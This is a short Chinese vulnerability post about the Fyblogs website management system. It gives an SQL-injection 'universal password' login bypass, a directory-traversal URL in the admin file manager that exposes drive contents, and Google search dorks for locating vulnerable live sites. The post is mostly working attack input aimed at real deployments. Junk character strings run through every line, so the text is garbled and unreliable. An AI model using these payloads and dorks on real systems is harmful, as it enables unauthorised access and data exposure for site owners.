漏洞类型: 未授权访问/权限绕过. e7 \$ M" z5 l* Q8 V
3 W! [! c$ \' ?- Q: ~7 H+ G
简要描述:7 k# v4 k( Y# P! y3 ~ w. A8 c5 s9 ]% A
9 w. n5 v9 w( fFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!3 z5 ^/ Y2 S+ D8 F1 C- S# w
& t' F3 k( [7 Z
详细说明:4 c9 P( }" X1 J; C! f
4 M. R: I4 I' ?0 q6 v* [% z! E
后台万能密码 'or'='or'2 @4 ?8 p# X& i6 t2 }+ ~* v
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
& b6 H( c( c. n2 U3 [admin/uploadfile.asp?currentFolder=/upfiles/../
+ h7 @3 c' J2 l" T5 Z% H
9 w [ Y" _. Y- u( `; D( g( q! V8 Z( o漏洞证明:
8 }6 F: I7 i+ u5 U) H! _) _3 w( Z4 H6 k" T' C7 c
谷歌:inurl:type.asp?id=1 新闻中心2 L% t# B; @$ Y P6 |( p( x
或者 :inurl:download_ok.asp?# T6 {: l2 G5 P3 z) Y* x1 E
. \9 P) J! R, d
可以测试6 a* Q) [/ v: v( T
6 g" q8 J7 O! R5 b& W* S9 B3 [
|